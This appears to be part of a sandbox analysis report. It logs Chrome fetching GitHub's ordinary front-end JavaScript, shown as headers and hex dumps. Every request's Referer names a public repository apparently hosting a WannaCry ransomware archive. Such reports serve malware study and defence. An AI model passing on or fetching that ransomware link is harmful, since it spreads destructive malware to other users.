                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 2c 77 29 2c 62 28 65 2c 22 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 22 2c 78 29 2c 54 28 65 2c 53 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 2c 69 3d 6e 2e 6c 65 6e 67 74 68 3b 72 3c 69 26 26 21 6d 2e 67 65 74 28 65 29 3b 72 2b 2b 29 7b 76 61 72 20 6f 3d 6e 5b 72 5d 3b 76 2e 73 65 74 28 65 2c 6f 2e 6e 6f 64 65 29 3b 66 6f 72 28 76 61 72 20 73 3d 30 2c 61 3d 6f 2e 6f 62 73 65 72 76 65 72 73 2e 6c 65 6e 67 74 68 3b 73 3c 61 26 26 21 67 2e 67 65 74 28 65 29 3b 73 2b 2b 29 6f 2e 6f 62 73 65 72 76 65 72 73 5b 73 5d 2e 64 61 74 61 2e 63 61 6c 6c 28 6f 2e 6e 6f 64 65 2c 65 29 7d 76 2e 64 65 6c 65 74 65 28 65 29 2c 54 28 65 29 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 61 72 67 75 6d 65 6e 74 73
                                                                                      Data Ascii: ,w),b(e,"stopImmediatePropagation",x),T(e,S);for(var r=0,i=n.length;r<i&&!m.get(e);r++){var o=n[r];v.set(e,o.node);for(var s=0,a=o.observers.length;s<a&&!g.get(e);s++)o.observers[s].data.call(o.node,e)}v.delete(e),T(e)}}}}function k(e,t,n){var i=arguments
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 74 3a 6e 2c 65 6e 64 3a 65 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 3a 74 7d 29 7d 6e 2e 64 28 74 2c 7b 52 3a 28 29 3d 3e 54 65 6d 70 6c 61 74 65 49 6e 73 74 61 6e 63 65 2c 58 4b 3a 28 29 3d 3e 67 7d 29 3b 76 61 72 20 69 2c 6f 2c 73 2c 61 2c 6c 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 21 74 2e 68 61 73 28 65 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64 20 74 6f 20 73 65 74 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 74 2e 73 65 74 28 65 2c 6e 29 2c 6e 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 74 2e 68 61 73 28 65 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64
                                                                                      Data Ascii: t:n,end:e.length,value:t})}n.d(t,{R:()=>TemplateInstance,XK:()=>g});var i,o,s,a,l,u=function(e,t,n){if(!t.has(e))throw TypeError("attempted to set private field on non-instance");return t.set(e,n),n},c=function(e,t){if(!t.has(e))throw TypeError("attempted
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 65 2e 76 61 6c 75 65 29 2e 6a 6f 69 6e 28 22 22 29 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 4e 53 28 74 68 69 73 2e 61 74 74 72 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 74 68 69 73 2e 61 74 74 72 2e 6e 61 6d 65 2c 65 29 7d 7d 7d 3b 76 61 72 20 70 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 21 74 2e 68 61 73 28 65 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64 20 74 6f 20 73 65 74 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 74 2e 73 65 74 28 65 2c 6e 29 2c 6e 7d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 74 2e 68 61 73 28 65
                                                                                      Data Ascii: ng"==typeof e?e:e.value).join("");this.element.setAttributeNS(this.attr.namespaceURI,this.attr.name,e)}}};var p=function(e,t,n){if(!t.has(e))throw TypeError("attempted to set private field on non-instance");return t.set(e,n),n},h=function(e,t){if(!t.has(e
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 74 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 74 2e 73 65 74 28 65 2c 6e 29 2c 6e 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 74 2e 68 61 73 28 65 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64 20 74 6f 20 67 65 74 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 74 2e 67 65 74 28 65 29 7d 3b 6c 65 74 20 54 65 6d 70 6c 61 74 65 49 6e 73 74 61 6e 63 65 3d 63 6c 61 73 73 20 54 65 6d 70 6c 61 74 65 49 6e 73 74 61 6e 63 65 20 65 78 74 65 6e 64 73 20 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 2c 6e 3d 6d
                                                                                      Data Ascii: t private field on non-instance");return t.set(e,n),n},y=function(e,t){if(!t.has(e))throw TypeError("attempted to get private field on non-instance");return t.get(e)};let TemplateInstance=class TemplateInstance extends DocumentFragment{constructor(e,t,n=m
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 34 2d 65 2e 6c 65 6e 67 74 68 25 34 29 25 34 29 2c 6e 3d 65 2e 72 65 70 6c 61 63 65 28 2f 2d 2f 67 2c 22 2b 22 29 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2f 22 29 2b 74 2c 72 3d 61 74 6f 62 28 6e 29 2c 69 3d 6e 65 77 20 41 72 72 61 79 42 75 66 66 65 72 28 72 2e 6c 65 6e 67 74 68 29 2c 6f 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 69 29 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 72 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 6f 5b 65 5d 3d 72 2e 63 68 61 72 43 6f 64 65 41 74 28 65 29 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 6c 65 74 20 74 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 65 29 2c 6e 3d 22 22 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 74 29 6e 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28
                                                                                      Data Ascii: 4-e.length%4)%4),n=e.replace(/-/g,"+").replace(/_/g,"/")+t,r=atob(n),i=new ArrayBuffer(r.length),o=new Uint8Array(i);for(let e=0;e<r.length;e++)o[e]=r.charCodeAt(e);return i}function i(e){let t=new Uint8Array(e),n="";for(let e of t)n+=String.fromCharCode(


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      72192.168.2.1649777185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC644OUTGET /assets/sessions-694c8423e347.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 12037
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 19 Mar 2024 16:34:30 GMT
                                                                                      ETag: 0x8DC483273BA584E
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 243896
                                                                                      X-Served-By: cache-iad-kjyo7100173-IAD, cache-lga21983-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 26, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 97d668fcd7b24b0ca6e88a23decc75d545405b57
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 73 65 73 73 69 6f 6e 73 22 5d 2c 7b 39 32 33 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 5a 47 3a 28 29 3d 3e 73 2c 71 36 3a 28 29 3d 3e 63 2c 77 34 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 6f 3d 6e 28 38 34 33 39 29 3b 6c 65 74 20 72 3d 21 31 2c 69 3d 6e 65 77 20 6f 2e 5a 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 6c 65 74 20 74 3d 65 2e 74 61 72 67 65 74 3b 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 74 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 4e 6f 64 65 2e 44 4f 43 55 4d 45 4e 54
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["sessions"],{9238:(e,t,n)=>{n.d(t,{ZG:()=>s,q6:()=>c,w4:()=>u});var o=n(8439);let r=!1,i=new o.Z;function a(e){let t=e.target;if(t instanceof HTMLElement&&t.nodeType!==Node.DOCUMENT
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 28 29 3b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 69 74 68 75 62 2d 6d 6f 62 69 6c 65 2d 61 75 74 68 65 6e 74 69 63 61 74 65 2d 70 72 6f 6d 70 74 22 29 3b 65 26 26 28 65 2e 68 69 64 64 65 6e 3d 21 31 29 3b 6c 65 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 69 74 68 75 62 2d 6d 6f 62 69 6c 65 2d 61 75 74 68 65 6e 74 69 63 61 74 65 2d 65 72 72 6f 72 2d 61 6e 64 2d 72 65 74 72 79 22 29 3b 74 26 26 28 74 2e 68 69 64 64 65 6e 3d 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 65 26 26 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 6e 65 77 20 6f 2e 52 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 74 65 6d 70 6c 61 74 65
                                                                                      Data Ascii: ();let e=document.getElementById("github-mobile-authenticate-prompt");e&&(e.hidden=!1);let t=document.getElementById("github-mobile-authenticate-error-and-retry");t&&(t.hidden=!0)}function c(e){e&&function(e){let t=new o.R(document.querySelector("template
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 53 54 41 54 55 53 5f 41 43 54 49 56 45 22 3a 63 61 73 65 22 53 54 41 54 55 53 5f 45 52 52 4f 52 22 3a 63 61 73 65 22 53 54 41 54 55 53 5f 55 4e 4b 4e 4f 57 4e 22 3a 62 72 65 61 6b 3b 63 61 73 65 22 53 54 41 54 55 53 5f 52 45 4a 45 43 54 45 44 22 3a 72 65 74 75 72 6e 20 73 3d 6c 28 22 65 72 72 6f 72 2d 66 6c 61 73 68 22 29 2c 6e 3f 6e 28 73 29 3a 76 6f 69 64 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 69 74 68 75 62 2d 6d 6f 62 69 6c 65 2d 72 65 6a 65 63 74 65 64 2d 72 65 64 69 72 65 63 74 22 29 2e 63 6c 69 63 6b 28 29 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 73 3d 6c 28 22 65 72 72 6f 72 2d 66 6c 61 73 68 22 29 2c 6e 3f 6e 28 73 29 3a 63 28 73 29 7d 61 77 61 69 74 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 65 3d
                                                                                      Data Ascii: "STATUS_ACTIVE":case"STATUS_ERROR":case"STATUS_UNKNOWN":break;case"STATUS_REJECTED":return s=l("error-flash"),n?n(s):void document.getElementById("github-mobile-rejected-redirect").click();default:return s=l("error-flash"),n?n(s):c(s)}await new Promise(e=
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 29 3b 73 77 69 74 63 68 28 69 2e 72 65 73 70 6f 6e 73 65 2e 73 74 61 74 75 73 29 7b 63 61 73 65 20 34 30 34 3a 63 61 73 65 20 34 32 32 3a 63 61 73 65 20 34 32 39 3a 72 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 69 2e 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 29 2e 65 72 72 6f 72 2c 72 2e 68 69 64 64 65 6e 3d 21 31 7d 7d 69 66 28 6e 29 73 77 69 74 63 68 28 6e 2e 73 74 61 74 75 73 29 7b 63 61 73 65 20 32 30 30 3a 63 61 73 65 20 32 30 31 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 30 32 3a 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 63 6f 6e 66 69 67 75 72 65 2d 73 6d 73 2d 66 61 6c 6c 62 61 63 6b 22 29 2e 68 69 64 64 65 6e 3d 21 30 2c 65 2e 71
                                                                                      Data Ascii: );switch(i.response.status){case 404:case 422:case 429:r.textContent=JSON.parse(i.response.text).error,r.hidden=!1}}if(n)switch(n.status){case 200:case 201:window.location.reload();break;case 202:e.querySelector(".js-configure-sms-fallback").hidden=!0,e.q
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 63 74 69 6f 6e 20 6c 28 29 7b 6c 65 74 20 65 3d 61 77 61 69 74 20 28 30 2c 69 2e 6b 29 28 29 2c 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 63 6f 6e 64 69 74 69 6f 6e 61 6c 2d 77 65 62 61 75 74 68 6e 2d 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 77 65 62 61 75 74 68 6e 2d 67 65 74 22 29 3b 69 66 28 6e 26 26 6e 75 6c 6c 21 3d 3d 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 75 62 74 6c 65 2d 6c 6f 67 69 6e 22 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 6f 3d 61 77 61 69 74 20 63 28 29 3b 69 66 28 74 26 26 6f 26 26 22 73 75 70 70 6f 72 74 65 64 22 3d 3d 3d 65 29 7b 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22
                                                                                      Data Ascii: ction l(){let e=await (0,i.k)(),t=document.querySelector(".js-conditional-webauthn-placeholder"),n=document.querySelector("webauthn-get");if(n&&null!==n.getAttribute("subtle-login"))return;let o=await c();if(t&&o&&"supported"===e){document.querySelector("
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 21 28 21 28 30 2c 64 2e 6b 6f 29 28 29 26 26 22 74 72 75 65 22 21 3d 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 2d 65 6d 75 2d 73 73 6f 22 29 26 26 72 2e 69 6e 63 6c 75 64 65 73 28 22 5f 22 29 29 7c 7c 72 2e 69 6e 63 6c 75 64 65 73 28 22 40 22 29 7c 7c 5b 22 70 6a 5f 6e 69 74 69 6e 22 2c 22 75 70 5f 74 68 65 5f 69 72 6f 6e 73 22 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 7c 7c 72 2e 65 6e 64 73 57 69 74 68 28 22 5f 61 64 6d 69 6e 22 29 7c 7c 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 65 76 65 6c 6f 70 6d 65 6e 74 22 29 26 26 72 2e 65 6e 64 73 57 69 74 68 28 22 5f 66 61 62 22 29 3f 28 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 2c 6f 2e 76 61 6c 75 65 3d 6f 2e 67 65 74 41 74 74 72
                                                                                      Data Ascii: !(!(0,d.ko)()&&"true"!==o.getAttribute("disable-emu-sso")&&r.includes("_"))||r.includes("@")||["pj_nitin","up_the_irons"].includes(r)||r.endsWith("_admin")||o.getAttribute("development")&&r.endsWith("_fab")?(n.removeAttribute("disabled"),o.value=o.getAttr
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 65 74 20 64 6f 63 75 6d 65 6e 74 20 64 6f 6d 61 69 6e 22 29 3b 6e 2e 65 6e 64 73 57 69 74 68 28 22 2e 67 69 74 68 75 62 2e 63 6f 6d 22 29 26 26 28 6e 3d 22 67 69 74 68 75 62 2e 63 6f 6d 22 29 3b 6c 65 74 20 6f 3d 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 72 3d 6e 65 77 20 44 61 74 65 28 6f 2d 31 29 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 2c 69 3d 22 68 74 74 70 73 3a 22 3d 3d 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 3f 22 3b 20 73 65 63 75 72 65 22 3a 22 22 2c 61 3d 60 3b 20 65 78 70 69 72 65 73 3d 24 7b 72 7d 60 3b 21 31 3d 3d 3d 74 26 26 28 6e 3d 60 2e 24 7b 6e 7d 60 29 3b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 60 24 7b 65 7d 3d 27 27 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 24 7b 6e 7d
                                                                                      Data Ascii: et document domain");n.endsWith(".github.com")&&(n="github.com");let o=new Date().getTime(),r=new Date(o-1).toUTCString(),i="https:"===location.protocol?"; secure":"",a=`; expires=${r}`;!1===t&&(n=`.${n}`);try{document.cookie=`${e}=''; path=/; domain=${n}
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 75 65 3d 6f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 74 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 73 65 6c 65 63 74 22 3d 3d 3d 74 7c 7c 22 74 65 78 74 61 72 65 61 22 3d 3d 3d 74 7c 7c 22 69 6e 70 75 74 22 3d 3d 3d 74 26 26 22 73 75 62 6d 69 74 22 21 3d 3d 6e 26 26 22 72 65 73 65 74 22 21 3d 3d 6e 7c 7c 65 2e 69 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 6e
                                                                                      Data Ascii: ue=o)}}function u(e){if(!(e instanceof HTMLElement))return!1;let t=e.nodeName.toLowerCase(),n=(e.getAttribute("type")||"").toLowerCase();return"select"===t||"textarea"===t||"input"===t&&"submit"!==n&&"reset"!==n||e.isContentEditable}function c(e){return n
                                                                                      2024-03-23 14:47:26 UTC1013INData Raw: 7a 75 3a 28 29 3d 3e 72 2e 7a 75 7d 29 3b 76 61 72 20 6f 3d 6e 28 36 30 33 32 37 29 2c 72 3d 6e 28 36 36 31 39 39 29 7d 2c 36 36 31 39 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 69 47 3a 28 29 3d 3e 72 2c 6a 58 3a 28 29 3d 3e 61 2c 6e 34 3a 28 29 3d 3e 6f 2c 7a 75 3a 28 29 3d 3e 69 7d 29 3b 6c 65 74 20 6f 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 3f 76 6f 69 64 20 30 3a 64 6f 63 75 6d 65 6e 74 2c 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 76 6f 69 64 20 30 3a 77 69 6e 64 6f 77 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 68 69 73 74 6f 72 79 3f 76 6f 69 64 20 30 3a 68 69 73 74 6f 72 79 2c 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d
                                                                                      Data Ascii: zu:()=>r.zu});var o=n(60327),r=n(66199)},66199:(e,t,n)=>{n.d(t,{iG:()=>r,jX:()=>a,n4:()=>o,zu:()=>i});let o="undefined"==typeof document?void 0:document,r="undefined"==typeof window?void 0:window,i="undefined"==typeof history?void 0:history,a="undefined"=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      73192.168.2.1649778185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC701OUTGET /assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-7c5e7b04edd6.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 1179
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:09 GMT
                                                                                      ETag: 0x8DC33C6BF8E4146
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 1483695
                                                                                      X-Served-By: cache-iad-kjyo7100077-IAD, cache-ewr18169-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 453, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 2bfa139cb7aa829c4caca94ab6ed22b0a1b0d65c
                                                                                      2024-03-23 14:47:26 UTC1179INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 70 72 69 6d 65 72 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 6f 67 67 6c 65 2d 73 77 69 74 63 68 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 5d 2c 7b 34 31 30 31 37 3a 28 65 2c 74 2c 69 29 3d 3e 7b 69 2e 72 28 74 29 2c 69 2e 64 28 74 2c 7b 54 6f 67 67 6c 65 53 77 69 74 63 68 45 6c 65 6d 65 6e 74 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 73 3d 69 28 37 36 30 30 36 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 2c 69 2c 73 29 7b 76 61 72 20 72 2c 63 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_components_primer_experimental_toggle-switch-element_ts"],{41017:(e,t,i)=>{i.r(t),i.d(t,{ToggleSwitchElement:()=>c});var s=i(76006);function r(e,t,i,s){var r,c=arguments.length


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      74192.168.2.1649779185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC743OUTGET /assets/chunk-vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee0-5cdb6954f6de.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 9673
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 07 Nov 2023 20:10:43 GMT
                                                                                      ETag: 0x8DBDFCD9F37E384
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 2500928
                                                                                      X-Served-By: cache-iad-kcgs7200103-IAD, cache-lga21941-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 625, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 4f3d8c2ccb1257b446bc0adddfa0ae8a43e39396
